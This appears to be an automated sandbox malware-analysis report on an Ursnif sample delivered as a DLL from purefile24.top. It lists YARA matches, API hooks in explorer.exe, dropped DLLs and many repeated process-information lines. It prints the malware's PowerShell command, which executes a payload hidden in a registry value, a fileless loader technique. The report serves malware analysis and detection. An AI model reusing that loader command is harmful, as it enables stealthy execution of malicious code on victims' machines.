                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: CLBCatQ.pdb0t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
                Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp
                Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
                Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
                Source: Binary string: ole32.pdbltH5r source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: psapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
                Source: Binary string: bcrypt.pdb:t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
                Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb(t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: rundll32.pdb source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
                Source: Binary string: combase.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdbXP source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
                Source: Binary string: cryptbase.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
                Source: Binary string: wimm32.pdb@tl5 source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
                Source: Binary string: wUxTheme.pdb\tx5` source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp

                Data Obfuscation:

                barindex
                Suspicious powershell command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: section name: .data3
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: section name: .data2
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: section name: .data5
                Source: https___purefile24.top_4352wedfoifom.dllStatic PE information: section name: .data4
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_011121B3 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01112160 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10004611 push esp; retf
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001E53 push 761D85F0h; iretd
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10006C54 push eax; retf
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10003666 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007F070 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001277 push cs; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10009AAC push ds; iretd
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000397F push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000858B push edx; iretd
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10004197 push ebp; retf
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100075A8 push edx; iretd
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100095BD push ebx; iretd
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100039E3 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002FE6 push eax; retf
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007EFE0 push edx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0267ACE0 push ecx; ret
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0267B09B push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dllJump to dropped file

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: control.exe PID: 6752, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
                Hooks registry keys query functions (used to hide registry keys)Show sources
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
                Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
                Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007F8B0 EntryPoint,LoadIconW,CreateMenu,CloseFigure,GetDoubleClickTime,CharUpperW,GetMessageExtraInfo,OpenIcon,GetMenuItemCount,EndDoc,IsIconic,GetWindowContextHelpId,GetClipboardData,StrokePath,UnrealizeObject,GetMapMode,IsCharAlphaA,FlattenPath,EnumClipboardFormats,GetSysColorBrush,DestroyMenu,GetDCBrushColor,UpdateColors,GetColorSpace,CharNextA,GetQueueStatus,GetPolyFillMode,DestroyWindow,IsCharLowerA,SetMetaRgn,GetObjectType,EndPath,GetObjectType,IsCharAlphaW,OemKeyScan,CloseMetaFile,GetSysColorBrush,LoadCursorFromFileA,GetPixelFormat,SwapBuffers,UnrealizeObject,GetGraphicsMode,GetGraphicsMode,GetMapMode,UnrealizeObject,FlattenPath,GetMessagePos,GetTopWindow,PathToRegion,CloseWindow,GetDlgCtrlID,GetStretchBltMode,GetProcessWindowStation,CancelDC,CharLowerA,GetThreadDesktop,VkKeyScanW,CreatePatternBrush,DeleteColorSpace,IsWindowUnicode,WindowFromDC,GetKeyState,IsCharLowerA,CreateHalftonePalette,GetClipboardSequenceNumber,PathToRegion,GetMenuCheckMarkDimensions,LoadIconA,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextChars
                Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
